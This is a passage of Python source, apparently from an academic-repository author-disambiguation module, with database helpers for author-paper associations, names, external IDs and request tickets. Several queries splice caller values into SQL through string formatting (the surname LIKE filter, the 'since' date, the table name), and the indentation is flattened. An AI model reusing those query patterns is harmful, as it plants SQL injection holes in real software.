# moved to a new place and the rejection entry added, but never exist as a rejection only.
# Hence, to force rabbit to reassign it we have to delete the rejection.
printer("Reassigning bibrecs with missing entries: %s" % str(to_reassign))
for sig in to_reassign:
table, ref, rec = sig
_delete_from_aidpersonidpapers_where(table=table, ref=ref, rec=rec, flag=-2)
recs = [paper[2] for paper in to_reassign]
rabbit(recs)
if to_deal_with:
# We got claims and rejections on the same paper for the same person. Let's forget about
# it and reassign it automatically, they'll make up their minds sooner or later.
printer("Deleting and reassigning bibrefrecs with conflicts %s" % str(to_deal_with))
for sig in to_deal_with:
pid, table, ref, rec = sig
_delete_from_aidpersonidpapers_where(table=table, ref=ref, rec=rec, pid=pid)
recs = map(itemgetter(3), to_deal_with)
rabbit(recs)
return impaired_rejections_found
def _delete_from_aidpersonidpapers_where(pid=None, table=None, ref=None, rec=None, name=None, flag=None, lcul=None):
'''
Deletes the records from aidPERSONIDPAPERS table with the given attributes.
If no parameters are given it deletes all records.
@param pid: author identifier
@type pid: int
@param table: bibref_table
@type table: int
@param ref: bibref_value
@type ref: int
@param rec: paper identifier
@type rec: int
@param name: author name
@type name: str
@param flag: flag
@type flag: int
@param lcul: lcul
@type lcul: int
'''
conditions = list()
add_condition = conditions.append
args = list()
add_arg = args.append
if pid is not None:
add_condition('personid=%s')
add_arg(pid)
if table is not None:
add_condition("bibref_table like %s")
add_arg(str(table))
if ref is not None:
add_condition('bibref_value=%s')
add_arg(ref)
if rec is not None:
add_condition('bibrec=%s')
add_arg(rec)
if name is not None:
add_condition('name=%s')
add_arg(name)
if flag is not None:
add_condition('flag=%s')
add_arg(flag)
if lcul is not None:
add_condition('lcul=%s')
add_arg(lcul)
if not conditions:
return
conditions_str = " and ".join(conditions)
query = ('delete from aidPERSONIDPAPERS '
'where %s') % conditions_str
run_sql(query, tuple(args))
# ********** getters **********#
def get_all_bibrecs_from_aidpersonidpapers():
'''
Gets all papers which are associated to some author.
@return: paper identifiers
@rtype: set set(int,)
'''
return set([i[0] for i in _select_from_aidpersonidpapers_where(select=['bibrec'])])
def get_all_paper_data_of_author(pid):
'''
Gets all data concerning the papers that the specified author is associated
with.
@param pid: author identifier
@type pid: int
@return: paper relevant data ((pid, bibref_table, bibref_value, bibrec),)
@rtype: tuple ((int, str, int, int),)
'''
return _select_from_aidpersonidpapers_where(select=['personid', 'bibref_table', 'bibref_value', 'bibrec', 'flag'], pid=pid)
def get_papers_of_author(pid, include_claimed=True, include_unclaimed=True, include_rejected=False): ### get_all_paper_records
'''
Gets all papers for the specific author. If 'include_claimed' flag is enabled
it takes into account claimed papers. Additionally if
'include_unclaimed' flag is enabled, it takes also into account unclaimed
papers as well. Finally, if 'include_rejected' flag is enabled, it takes also
into account rejecte papers.
@param pid: author identifier
@type pid: int
@param include_claimed: include a paper if it is claimed
@type include_claimed: bool
@param include_unclaimed: include unclaimed papers
@type include_unclaimed: bool
@param include_rejected: include rejected papers
@type include_rejected: bool
@return: records ((personid, bibref_table, bibref_value, bibrec, flag),)
@rtype: generator ((int, str, int, int, int),)
'''
args = []
if include_claimed:
args.append("flag=2")
if include_unclaimed:
args.append("(flag>-2 and flag<2)")
if include_rejected:
args.append("flag=-2")
where_str = ""
if args:
where_str = " and ( %s )" % " or ".join(args)
query = ('select personid, bibref_table, bibref_value, bibrec, flag '
'from aidPERSONIDPAPERS '
'where personid=%s' + where_str)
return set(run_sql(query, (pid,) ))
return set()
def get_confirmed_papers_of_authors(pids): # get_all_papers_of_pids
'''
Gets all records for the given authors.
@param pids: author identifiers
@type pids: list [int,]
@return: records ((personid, bibref_table, bibref_value, bibrec, flag),)
@rtype: generator ((int, str, int, int, int),)
'''
if not pids:
return ()
pids_sqlstr = _get_sqlstr_from_set(pids)
papers = run_sql('select personid, bibref_table, bibref_value, bibrec, flag '
'from aidPERSONIDPAPERS '
'where personid in %s and flag > -2' % pids_sqlstr)
return (p for p in papers)
def get_confirmed_papers_of_author(pid): # get_person_bibrecs
'''
Gets all papers which are associated (non-negatively) to the given author.
@param pid: author identifier
@type pid: int
@return: paper identifiers
@rtype: list [int,]
'''
papers = run_sql('select bibrec '
'from aidPERSONIDPAPERS '
'where personid=%s and flag > -2', (str(pid),))
papers = list(set([p[0] for p in papers]))
return papers
def get_claimed_papers_of_author(pid): # get_claimed_papers
'''
Gets all signatures for the manually claimed papers of the given author.
@param pid: author identifier
@type pid: int
@return: signatures ((bibref_table, bibref_value, bibrec),)
@rtype: tuple ((str, int, int),)
'''
return run_sql('select bibref_table, bibref_value, bibrec '
'from aidPERSONIDPAPERS '
'where personid=%s and flag > %s', (pid, 1))
def get_claimed_papers_from_papers(recs):
'''
Given a set of papers it returns the subset of claimed papers.
@param recs: paper identifiers
@type recs: frozenset frozenset(int,)
@return: claimed paper identifiers
@rtype: tuple ((int),)
'''
recs_sqlstr = _get_sqlstr_from_set(recs)
claimed_recs = set(run_sql('select bibrec '
'from aidPERSONIDPAPERS '
'where bibrec in %s and flag=2' % recs_sqlstr))
return claimed_recs
def get_rec_to_signatures_mapping():
table = _select_from_aidpersonidpapers_where(
select=['personid',
'bibref_table',
'bibref_value',
'bibrec',
'name'])
cache = defaultdict(list)
for row in table:
cache[int(row[3])].append(row)
return cache
def get_signatures_of_paper(rec): # get_signatures_from_rec
'''
Gets all records with the given paper identifier.
@param rec: paper identifier
@type rec: int
@return: records with the given paper identifier ((pid, bibref_table, bibref_value, bibrec, name),)
@rtype: tuple ((int, str, int, int, str),)
'''
return _select_from_aidpersonidpapers_where(select=['personid', 'bibref_table', 'bibref_value', 'bibrec', 'name'], rec=rec)
def get_status_of_signature(sig_str): # get_bibref_modification_status
'''
Gets the author-paper association status for the given signature.
@param sig_str: signature (e.g. '100:7531,9024')
@type sig_str: str
@return: author-paper association status (flag, lcul)
@rtype: tuple (int, int)
'''
if not sig_str:
raise ValueError("A signature identifier is expected!")
sig = _split_signature_string(sig_str)
table, ref, rec = sig
flags = _select_from_aidpersonidpapers_where(select=['flag', 'lcul'], table=table, ref=ref, rec=rec)
if flags:
return flags[0]
else:
return (False, 0)
def get_author_and_status_of_signature(sig_str): # get_papers_status
'''
Gets the authors and the author-paper association status (for each author)
of the paper reffered in the given signature.
@param sig_str: signature (e.g. '100:7531,9024')
@type sig_str: str
@return: author identifiers and the author-paper association status [(bibref_table, bibref_value, bibrec), personid, flag]
@rtype: list [[(str, int, int), int, int)],]
'''
sig = _split_signature_string(sig_str)
table, ref, rec = sig
author_and_status = _select_from_aidpersonidpapers_where(select=['personid', 'flag'], table=table, ref=ref, rec=rec)
return [[sig] + list(i) for i in author_and_status]
def get_ordered_author_and_status_of_signature(sig): # get_signature_info
'''
Gets the author and the author-paper association status affiliated to the
given signature.
@param sig: signature (bibref_table, bibref_value, bibrec)
@type sig: tuple (str, int, int)
@return: author identifier and author-paper association status
@rtype: tuple ((int, int),)
'''
return run_sql('select personid, flag '
'from aidPERSONIDPAPERS '
'where bibref_table like %s '
'and bibref_value=%s '
'and bibrec=%s '
'order by flag', sig)
def get_author_and_status_of_confirmed_paper(sig): # personid_from_signature
'''
Gets the confirmed author and author-paper association status affiliated to
the given signature.
@param sig: signature (bibref_table, bibref_value, bibrec)
@type sig: tuple (str, int, int)
@return: author identifier and author-paper association status
@rtype: tuple ((int, int),)
'''
conf_author_and_status = run_sql('select personid, flag '
'from aidPERSONIDPAPERS '
'where bibref_table like %s '
'and bibref_value=%s '
'and bibrec=%s '
'and flag > -2', sig)
assert len(conf_author_and_status) < 2, "More that one author hold the same signature: %s" % conf_author_and_status
return conf_author_and_status
def get_author_info_of_confirmed_paper(sig): # personid_name_from_signature
'''
Gets the confirmed author and author name affiliated to the given
signature.
@param sig: signature (bibref_table, bibref_value, bibrec)
@type sig: tuple (str, int, int)
@return: author identifier and author name
@rtype: tuple ((int, str),)
'''
conf_author = run_sql('select personid, name '
'from aidPERSONIDPAPERS '
'where bibref_table like %s '
'and bibref_value=%s '
'and bibrec=%s '
'and flag > -2', sig)
assert len(conf_author) < 2, "More than one author hold the same signature: %s" % str(conf_author)
return conf_author
def get_authors_of_claimed_paper(rec): # get_personids_from_bibrec
'''
Gets all the authors who are associated (non-negatively) with the given
paper.
@param rec: paper identifier
@type rec: int
@return: author identifiers
@rtype: set set(int,)
'''
pids = run_sql('select personid '
'from aidPERSONIDPAPERS '
'where bibrec=%s '
'and flag > -2', (rec,))
if not pids:
return set()
return set([pid[0] for pid in pids])
def get_personid_signature_association_for_paper(rec):
data = run_sql("select personid, bibref_table, bibref_value from aidPERSONIDPAPERS where "
"bibrec = %s and flag > -2", (rec,))
associations = defaultdict(list)
for i in data:
associations[str(i[1]) + ':' + str(i[2])] = int(i[0])
return associations
def get_coauthors_of_author(pid, excluding_recs=None): # get_coauthor_pids
'''
Gets the authors who are sharing papers with the given author excluding
from the common papers the specified set.
@param pid: author identifier
@type pid: int
@param excluding_recs: excluding paper identifiers
@type excluding_recs: list [int,]
'''
recs = get_confirmed_papers_of_author(pid)
if excluding_recs:
exclude_set = set(excluding_recs)
recs = set(recs) - exclude_set
else:
exclude_set = set()
if not recs:
return list()
recs_sqlstr = _get_sqlstr_from_set(recs)
pids = run_sql('select personid, bibrec '
'from aidPERSONIDPAPERS '
'where bibrec in %s '
'and flag > -2' % recs_sqlstr)
pids = set([(int(p), int(r)) for p, r in pids if (int(p) != int(pid) and int(r) not in exclude_set)])
pids = sorted([p for p, r in pids])
pids = groupby(pids)
pids = [(key, len(list(val))) for key, val in pids]
pids = sorted(pids, key=itemgetter(1), reverse=True)
return pids
def get_names_to_records_of_author(pid): # get_person_names_count
'''
Returns the set of names and times each name appears from the records which
are associated to the given author.
@param pid: author identifier
@type pid: int
@return: set of names and times each name appears
@rtype: set set((int, str),)
'''
author_names = run_sql('select name, bibrec '
'from aidPERSONIDPAPERS '
'where personid=%s '
'and flag > -2', (pid,))
author_names = [(name[0], name[1]) for name in author_names]
names_count = defaultdict(set)
for name, bibrec in author_names:
names_count[name].add(bibrec)
return dict((x, list(y)) for x, y in names_count.items())
def get_names_count_of_author(pid):
return dict((x, len(y)) for x, y in get_names_to_records_of_author(pid).items()).items()
def _get_external_ids_from_papers_of_author(pid, limit_to_claimed_papers=False, force_cache_tables=False): # collect_personID_external_ids_from_papers
'''
Gets a mapping which associates an external system (e.g. Inspire) with the
identifiers that the given author carries in that system (based on the
papers he is associated with).
@param pid: author identifier
@type pid: int
@param limit_to_claimed_papers: take into account only claimed papers
@type limit_to_claimed_papers: bool
@return: mapping
@rtype: dict {str: set(str,)}
'''
external_ids = dict()
if bconfig.COLLECT_EXTERNAL_ID_INSPIREID:
flag = -2
if limit_to_claimed_papers:
flag = 1
sigs = run_sql('select bibref_table, bibref_value, bibrec '
'from aidPERSONIDPAPERS '
'where personid=%s '
'and flag > %s', (pid, flag))
records_to_cache = [x[2] for x in sigs]
# if len(records_to_cache) >= bconfig.EXT_ID_CACHE_THRESHOLD:
populate_partial_marc_caches(records_to_cache)
inspire_ids = set()
for sig in sigs:
try:
inspire_id = get_inspire_id_of_signature(sig)[0]
except IndexError:
inspire_id = None
if inspire_id is not None:
inspire_ids.add(inspire_id)
external_ids[bconfig.PERSONID_EXTERNAL_IDENTIFIER_MAP['Inspire']] = inspire_ids
return external_ids
def get_validated_request_tickets_for_author(pid, tid=None): # get_validated_request_ticket
'''
Gets the request tickets for the given author after it validates that their
entries are correct. If an entry is incorrect it discards it.
@param pid: author identifier
@type pid: int
@param tid: ticket identifier
@type tid: int
@return: validated request tickets (e.g. [[[('assign', '100:7531,9024'), ('reject', '100:7532,9025')], 1L],])
@rtype: list [[[(str, str),], int],]
'''
request_tickets = get_request_tickets_for_author(pid, tid)
for request_ticket in list(request_tickets):
request_ticket['operations'] = list(request_ticket['operations'])
for operation in list(request_ticket['operations']):
action, bibrefrec = operation
try:
table, ref, rec = _split_signature_string(bibrefrec)
present = bool(_select_from_aidpersonidpapers_where(select=['*'], table=table, ref=ref, rec=rec))
if not present:
request_ticket['operations'].remove(operation)
if not request_ticket['operations']:
remove_request_ticket_for_author(pid, tid=request_ticket['tid'])
except: # no matter what goes wrong that's an invalid entry in the ticket. We discard it!
request_ticket['operations'].remove(operation)
return request_tickets
def get_authors_by_name_regexp(name_regexp): # get_all_personids_by_name
'''
Gets authors whose name matches the regular expression pattern.
@param name_regexp: SQL regular expression
@type name_regexp: str
@return: authors whose name satisfies the regexp ((personid, name),)
@rtype: tuple ((int, str),)
'''
return run_sql('select personid, name '
'from aidPERSONIDPAPERS '
'where name like %s '
'and flag > -2 '
'group by personid, name', (name_regexp,))
def get_authors_by_name(name, limit_to_recid=False, use_matchable_name=False): # find_pids_by_exact_name
'''
Gets all authors who have records with the specified name.
@param name: author name
@type name: str
@return: author identifiers
@rtype: set set((int),)
'''
if use_matchable_name:
name_column = 'm_name'
else:
name_column = 'name'
query_string_one = "select distinct(personid) from aidPERSONIDPAPERS where %s" % name_column
if limit_to_recid:
pids = run_sql("".join([query_string_one, "=%s and bibrec=%s and flag>-2"]),
(name, limit_to_recid))
return [pid[0] for pid in pids]
else:
pids = run_sql("".join([query_string_one, "=%s and flag>-2"]),
(name,))
return [pid[0] for pid in pids]
def get_paper_to_author_and_status_mapping(): # get_bibrefrec_to_pid_flag_mapping
'''
Gets a mapping which associates signatures with author identifiers and the
status of the author-paper association (of the paper that the signature is
reffering to).
@return: mapping
@rtype: dict {(str, int, int): set((int, int),)}
'''
mapping = defaultdict(list)
sigs_authors = _select_from_aidpersonidpapers_where(
select=['bibref_table', 'bibref_value', 'bibrec', 'personid', 'flag'])
gc.disable()
for i in sigs_authors:
sig = (i[0], i[1], i[2])
pid_flag = (i[3], i[4])
mapping[sig].append(pid_flag)
gc.collect()
gc.enable()
return mapping
def get_author_to_papers_mapping(recs, limit_by_name=None): # get_personids_and_papers_from_bibrecs
'''
It finds the authors of the given papers and returns a mapping which
associates each author with the set of papers he has affiliation with.
If 'limit_by_name' is specified it will take into account only the authors
who carry the specific surname.
@param recs: paper identifiers
@type recs: list [int,]
@param limit_by_name: author surname
@type limit_by_name: str
@return: mapping
@rtype: list [(int, set(int,)),]
'''
pids_papers = list()
if not recs:
return pids_papers
recs_sqlstr = _get_sqlstr_from_set(recs)
surname = None
if limit_by_name:
surname = limit_by_name
if surname:
pids_papers = run_sql('select personid, bibrec '
'from aidPERSONIDPAPERS '
'where bibrec in %s '
'and name like %s' % (recs_sqlstr, '"' + surname + '%' + '"'))
else:
pids_papers = run_sql('select personid, bibrec '
'from aidPERSONIDPAPERS '
'where bibrec in %s' % recs_sqlstr)
pids_papers = sorted(pids_papers, key=itemgetter(0))
pids_papers = groupby(pids_papers, key=itemgetter(0))
pids_papers = [(pid, set([tup[1] for tup in pid_paps])) for pid, pid_paps in pids_papers]
pids_papers = sorted(pids_papers, key=lambda x: len(x[1]), reverse=True)
return pids_papers
def get_author_to_confirmed_names_mapping(since=None): # get_all_modified_names_from_personid
'''
For all authors it gets the set of names from the papers each author is
associated with. It excludes the names that come from rejected papers.
If 'since' is specified, only authors with modified records after this date
are taken into account.
@param since: consider only authors with modified records after this date
@type since: str
@return: mapping
@rtype: generator ((int, set([str,], int)),)
'''
args = list()
add_arg = args.append
query = ('select personid, name '
'from aidPERSONIDPAPERS '
'where flag > -2')
if since:
query += " and last_updated > %s"
add_arg(since)
pids_names = run_sql(query, tuple(args))
if since:
pids = set([pid for pid, _ in pids_names])
pids_sqlstr = _get_sqlstr_from_set(pids)
pids_names = run_sql('select personid, name '
'from aidPERSONIDPAPERS '
'where personid in %s '
'and flag > -2' % pids_sqlstr)
res = dict()
for pid, name in pids_names:
try:
res[pid][1].add(name)
res[pid][2] += 1
except KeyError:
res[pid] = [pid, set([name]), 1]
return (tuple(res[pid]) for pid in res.keys())
def get_all_modified_names_from_personid(since=None):
if since:
all_pids = run_sql("SELECT DISTINCT personid "
"FROM aidPERSONIDPAPERS "
"WHERE flag > -2 "
"AND last_updated > %s"
% since)
else:
all_pids = run_sql("SELECT DISTINCT personid "
"FROM aidPERSONIDPAPERS "
"WHERE flag > -2 ")
return ((name[0][0], set(n[1] for n in name), len(name))
for name in (run_sql(
"SELECT personid, name "
"FROM aidPERSONIDPAPERS "
"WHERE personid = %s "
"AND flag > -2", p)
for p in all_pids))
def get_author_to_name_and_occurrence_mapping():
'''
Gets a mapping which associates authors with the set of names they carry
and the number of times each name occurs in their papers.
@return: mapping
@rtype: dict {int: {str: int},}
'''
cl = lambda: defaultdict(int)
mapping = defaultdict(cl)
authors = run_sql('select personid, name '
'from aidPERSONIDPAPERS '
'where flag > -2')
for pid, name in authors:
mapping[pid][name] += 1
return mapping
def get_name_to_authors_mapping(): # get_name_string_to_pid_dictionary
'''
Gets a mapping which associates names with the set of authors who carry
each name.
@return: mapping
@rtype: dict {str: set(int,)}
'''
mapping = defaultdict(set)
authors = _select_from_aidpersonidpapers_where(select=['personid', 'name'])
for pid, name in authors:
mapping[name].add(pid)
return mapping
def get_confirmed_name_to_authors_mapping():
'''
Gets a mapping which associates confirmed names with the set of authors who
carry each name.
@return: mapping
@rtype: dict {str: set(int,)}
'''
mapping = defaultdict(set)
authors = run_sql('select personid, name '
'from aidPERSONIDPAPERS '
'where flag > -2')
for pid, name in authors:
mapping[name].add(pid)
return mapping
def get_all_author_paper_associations(table_name='aidPERSONIDPAPERS'): # get_full_personid_papers
'''
Gets all author-paper associations (from aidPERSONIDPAPERS table or any
other table with the same structure).
@param table_name: name of the table with the author-paper associations
@type table_name: str
@return: author-paper associations ((pid, bibref_table, bibref_value, bibrec, name, flag, lcul),)
@rtype: tuple ((int, str, int, int, str, int, int),)
'''
return run_sql('select personid, bibref_table, bibref_value, bibrec, name, flag, lcul '
'from %s' % table_name)
def get_wrong_names():
'''
Returns a generator with all wrong names in aidPERSONIDPAPERS table.
@return: wrong names (table, ref, correct_name)
@rtype: generator ((str, int, str),)
'''
bib100 = dict((name_id, name_value) for name_id, name_value in get_bib10x())
bib700 = dict((name_id, name_value) for name_id, name_value in get_bib70x())
aidpersonidpapers100 = set(_select_from_aidpersonidpapers_where(select=['bibref_value', 'name'], table='100'))
aidpersonidpapers700 = set(_select_from_aidpersonidpapers_where(select=['bibref_value', 'name'], table='700'))
wrong100 = set(('100', nid, bib100.get(nid, None), nvalue) for nid, nvalue in aidpersonidpapers100
if nvalue != bib100.get(nid, None))
wrong700 = set(('700', nid, bib700.get(nid, None), nvalue) for nid, nvalue in aidpersonidpapers700
if nvalue != bib700.get(nid, None))
total = len(wrong100) + len(wrong700)
return chain(wrong100, wrong700), total
def get_signatures_of_paper_and_author(sig, pid, include_rejected=False): # find_conflicts
'''
Gets confirmed signatures for the given signature and author.
@param sig: signature (bibref_table, bibref_value, bibrec)
@type sig: tuple (int, int, int)
@param pid: author identifier
@type pid: int
@return: confirmed signatures
@rtype: tuple ((bibref_table, bibref_value, bibrec, flag),)
'''
query = """select bibref_table, bibref_value, bibrec, flag
from aidPERSONIDPAPERS where personid=%s
and bibrec=%s """
if not include_rejected:
query += 'and flag <> -2'
return run_sql(query, (pid, sig[2]))
def paper_affirmed_from_user_input(pid, sig_str): # person_bibref_is_touched_old
'''
Examines if the given author and the specified signature association has
been affirmed from user input.
@param pid: author identifier
@type pid: int
@param sig_str: signature (e.g. '100:7531,9024')
@type sig_str: str
@return: author and signature association is affirmed from user input
@rtype: bool
'''
sig = _split_signature_string(sig_str)
table, ref, rec = sig
flag = _select_from_aidpersonidpapers_where(select=['flag'], pid=pid, table=table, ref=ref, rec=rec)
try:
flag = flag[0][0]
except IndexError:
return False
if -2 < flag < 2:
return False
return True
def update_external_ids_of_authors(pids=None, overwrite=False, limit_to_claimed_papers=False, # update_personID_external_ids
force_cache_tables=False): # TODO turn to True
'''
Updates the external ids for the given authors. If no authors are specified
it does the updating for all authors. The possesion of an external id is
determined by the papers an author is associated with.
@param pids: author identifiers
@type pids: list [int,]
@param overwrite: deletes all existing ext ids and recalculates them from scratch
@type overwrite: bool
@param limit_to_claimed_papers: take into account only claimed papers
@type limit_to_claimed_papers: bool
@param force_cache_tables: use a caching mechanism for the calculation
@type force_cache_tables: bool
'''
if not pids:
pids = set([i[0] for i in _select_from_aidpersonidpapers_where(select=['personid'])])
for idx, pid in enumerate(pids):
logger.update_status(float(idx) / float(len(pids)), "Updating external ids...")
collected = _get_external_ids_from_papers_of_author(pid,
limit_to_claimed_papers=limit_to_claimed_papers,
force_cache_tables=True)
collected_ids_exist = False
for external_id in collected.values():
if external_id:
collected_ids_exist = True
break
if not collected_ids_exist and not overwrite:
continue
present = get_external_ids_of_author(pid)
if overwrite:
for ext_system_id in present.keys():
for ext_id in present[ext_system_id]:
_remove_external_id_from_author(pid, ext_system_id, ext_id)
present = dict()
for ext_system_id in collected.keys():
for ext_id in collected[ext_system_id]:
if ext_system_id not in present or ext_id not in present[ext_system_id]:
add_external_id_to_author(pid, ext_system_id, ext_id, avoid_id_duplication=False)
if force_cache_tables:
destroy_partial_marc_caches()
logger.update_status_final("Updating external ids finished.")
def _select_from_aidpersonidpapers_where(
select=None,
pid=None,
table=None,
ref=None,
rec=None,
name=None,
flag=None,
lcul=None):
'''
Selects the given fields from the records of aidPERSONIDPAPERS table
with the specified attributes. If no parameters are given it returns all
records.
@param select: fields to select
@type select: list [str,]
@param pid: author identifier
@type pid: int
@param table: bibref_table
@type table: int
@param ref: bibref_value
@type ref: int
@param rec: paper identifier
@type rec: int
@param name: author name
@type name: str
@param flag: author-paper association status
@type flag: int
@param lcul: lcul
@type lcul: int
@return: given fields of the records with the specified attributes
@rtype: tuple
'''
if not select:
return None
conditions = list()
add_condition = conditions.append
args = list()
add_arg = args.append
add_condition('True')
if pid is not None:
add_condition('personid=%s')
add_arg(pid)
if table is not None:
add_condition("bibref_table like %s")
add_arg(str(table))
if ref is not None:
add_condition('bibref_value=%s')
add_arg(ref)
if rec is not None:
add_condition('bibrec=%s')
add_arg(rec)
if name is not None:
add_condition('name=%s')
add_arg(name)
if flag is not None:
add_condition('flag=%s')
add_arg(flag)
if lcul is not None:
add_condition('lcul=%s')
add_arg(lcul)
select_fields_str = ", ".join(select)
conditions_str = " and ".join(conditions)
query = ('select %s '
'from aidPERSONIDPAPERS '
'where %s') % (select_fields_str, conditions_str)
return run_sql(query, tuple(args))
#
#
# aidPERSONIDDATA table ###
#
#
# ********** setters **********#
def add_author_data(pid, tag, value, opt1=None, opt2=None, opt3=None): # set_personid_row
'''
Adds data under the specified tag for the given author.
@param pid: author identifier
@type pid: int
@param tag: data tag
@type tag: str
@param value: data tag value
@type value: str
@param opt1: opt1
@type opt1: int
@param opt2: opt2
@type opt2: int
@param opt3: opt3
@type opt3: str
'''
run_sql('insert into aidPERSONIDDATA (`personid`, `tag`, `data`, `opt1`, `opt2`, `opt3`) '
'values (%s, %s, %s, %s, %s, %s)', (pid, tag, value, opt1, opt2, opt3))
def remove_author_data(tag, pid=None, value=None): # del_personid_row
'''
Deletes the data associated with the given tag. If 'pid' or 'value' are
specified the deletion is respectively restrained.
@param tag: data tag
@type tag: str
@param pid: author identifier
@type pid: int
@param value: data tag value
@type value: str
'''
if pid:
if value:
_delete_from_aidpersoniddata_where(pid=pid, tag=tag, data=value)
else:
_delete_from_aidpersoniddata_where(pid=pid, tag=tag)
else:
if value:
_delete_from_aidpersoniddata_where(tag=tag, data=value)
else:
_delete_from_aidpersoniddata_where(tag=tag)
def transfer_data_to_author(data, new_pid):
'''
@param papers_data:
@type papers_data: list
@param new_pid: new author identifier
@type new_pid: int
'''
for pid, tag in data:
run_sql('update aidPERSONIDDATA '
'set personid=%s '
'where personid=%s '
'and tag=%s', (new_pid, pid, tag))
def add_orcid_id_to_author(pid, orcid_id):
'''
Adds the external identifier for ORCID system to the given author.
@param pid: author identifier
@type pid: int
@param orcid_id: ORCID external identifier
@type orcid_id: str
'''
add_external_id_to_author(pid, 'ORCID', orcid_id)
def webuser_merge_user(old_uid, new_uid):
pid = run_sql("select personid from aidPERSONIDDATA where tag='uid' and data=%s", (old_uid,))
if pid:
add_userid_to_author(pid[0][0], new_uid)
def add_userid_to_author(pid, uid):
"""
Connects a userid to an author. If a userid is already present on that person, it gets flagged as old and
the new one will replace it. If another person has the same userid, it gets stolen.
"""
run_sql("update aidPERSONIDDATA set tag='uid_old' where tag='uid' and personid=%s", (pid,))
pid_is_present = run_sql("select personid from aidPERSONIDDATA where tag='uid' and data=%s", (uid,))
if not pid_is_present:
run_sql("insert into aidPERSONIDDATA (personid, tag, data) values (%s, 'uid', %s)", (pid, uid))
else:
run_sql(
"update aidPERSONIDDATA set personid=%s where personid=%s and tag='uid' and data=%s",
(pid,
pid_is_present[0][0],
uid))
def add_arxiv_papers_to_author(arxiv_papers, pid):
'''
Adds the arxiv papers list for the specified author. If one already exists
it compares them and in case they are different it updates it.
@param arxiv_papers: arxiv paper identifiers
@type arxiv_papers: list [str,]
@param pid: author identifier
@type pid: int
'''
old_arxiv_papers = get_arxiv_papers_of_author(pid)
if old_arxiv_papers and set(old_arxiv_papers) == set(arxiv_papers):
return
remove_arxiv_papers_of_author(pid)
arxiv_papers = serialize(arxiv_papers)
run_sql('insert into aidPERSONIDDATA (`personid`, `tag`, `datablob`) '
'values (%s, %s, %s)', (pid, 'arxiv_papers', arxiv_papers))
def remove_arxiv_papers_of_author(pid):
'''
Deletes the arxiv papers list of the specified author.
@param pid: author identifier
@type pid: int
'''
run_sql('delete from aidPERSONIDDATA '
'where tag=%s and personid=%s', ('arxiv_papers', pid))
def add_external_id_to_author(pid, ext_sys, ext_id, avoid_id_duplication=True): ### add_personID_external_id
'''
Adds the external identifier of the specified system to the given author.
@param pid: author identifier
@type pid: int
@param ext_sys: external system
@type ext_sys: str
@param ext_id: external identifier
@type ext_id: str
'''
present = False
if avoid_id_duplication:
id_string = "extid:%s" % ext_sys
present = run_sql('select data from aidPERSONIDDATA where personid=%s and tag=%s and data=%s' , (pid, id_string, ext_id))
if not present:
run_sql('insert into aidPERSONIDDATA (personid, tag, data) '
'values (%s, %s, %s)', (pid, 'extid:%s' % ext_sys, ext_id))
def _remove_external_id_from_author(pid, ext_sys, ext_id=None): # remove_personID_external_id
'''
Removes all identifiers of the specified external system from the given
author. If 'ext_id' is specified it removes the specific one.
@param pid: author identifier
@type pid: int
@param ext_sys: external system
@type ext_sys: str
@param ext_id: external identifier
@type ext_id: str
'''
if ext_id is None:
_delete_from_aidpersoniddata_where(pid=pid, tag='extid:%s' % ext_sys)
else:
_delete_from_aidpersoniddata_where(pid=pid, tag='extid:%s' % ext_sys, data=ext_id)
def update_request_ticket_for_author(pid, ticket_dict, tid=None): # update_request_ticket
'''
Creates/updates a request ticket for the given author with the specified
ticket 'image'.
@param pid: author identifier
@type pid: int
@param tag_value: ticket 'image' (e.g. (('paper', '700:316,10'),))
@type tag_value: tuple ((str, str),)
@param tid: ticket identifier
@type tid: int
'''
request_tickets = get_request_tickets_for_author(pid)
request_tickets_exist = bool(request_tickets)
if tid is None:
existing_tids = [0]
for request_ticket in request_tickets:
existing_tids.append(request_ticket['tid'])
tid = max(existing_tids) + 1
new_request_ticket = {'tid': tid}
for tag, value in ticket_dict.iteritems():
new_request_ticket[tag] = value
request_tickets.append(new_request_ticket)
else:
for request_ticket in request_tickets:
if request_ticket['tid'] == tid:
for tag, value in ticket_dict.iteritems():
request_ticket[tag] = value
break
for request_ticket in list(request_tickets):
if 'operations' not in request_ticket or not request_ticket['operations']:
request_tickets.remove(request_ticket)
request_tickets_num = len(request_tickets)
request_tickets = serialize(request_tickets)
if request_tickets_exist:
remove_request_ticket_for_author(pid)
run_sql("""insert into aidPERSONIDDATA
(personid, tag, datablob, opt1)
values (%s, %s, %s, %s)""",
(pid, 'request_tickets', request_tickets, request_tickets_num))
def remove_rtid_from_ticket(rtid, pid):
'''
Remove rtid from ticket blob in aidPERSONIDDATA.
'''
request_tickets = get_request_tickets_for_author(pid)
request_tickets_exist = bool(request_tickets)
for request_ticket in request_tickets:
if 'rtid' in request_ticket and request_ticket['rtid'] == rtid:
request_ticket.pop('rtid')
break
request_tickets_num = len(request_tickets)
request_tickets = serialize(request_tickets)
if request_tickets_exist:
remove_request_ticket_for_author(pid)
run_sql("""insert into aidPERSONIDDATA
(personid, tag, datablob, opt1)
values (%s, %s, %s, %s)""",
(pid, 'request_tickets', request_tickets, request_tickets_num))
def remove_request_ticket_for_author(pid, tid=None): # delete_request_ticket
'''
Removes a request ticket from the given author. If ticket identifier is not
specified it removes all the pending tickets for the given author.
@param pid: author identifier
@type pid: int
@param tid: ticket identifier
@type tid: int
'''
def remove_all_request_tickets_for_author(pid):
run_sql("""delete from aidPERSONIDDATA
where personid=%s
and tag=%s""",
(pid, 'request_tickets'))
if tid is None:
remove_all_request_tickets_for_author(pid)
return
request_tickets = get_request_tickets_for_author(pid)
if not request_tickets:
return
for request_ticket in list(request_tickets):
if request_ticket['tid'] == tid:
request_tickets.remove(request_ticket)
break
remove_all_request_tickets_for_author(pid)
if not request_tickets:
return
request_tickets_num = len(request_tickets)
request_tickets = serialize(request_tickets)
run_sql("""insert into aidPERSONIDDATA
(personid, tag, datablob, opt1)
values (%s, %s, %s, %s)""",
(pid, 'request_tickets', request_tickets, request_tickets_num))
def modify_canonical_name_of_authors(pids_newcnames=None): # change_personID_canonical_names
'''
Updates the existing canonical name of the given authors.
@param pids_newcnames: author - new canonical name pairs [(personid, new_canonical_name),]
@type pids_newcnames: list [(int, str),]
'''
for idx, pid_newcname in enumerate(pids_newcnames):
pid, newcname = pid_newcname
logger.update_status(float(idx) / float(len(pids_newcnames)), "Changing canonical names...")
# delete the existing canonical name of the current author and the
# current holder of the new canonical name
run_sql("""delete from aidPERSONIDDATA
where tag=%s
and (personid=%s or data=%s)""",
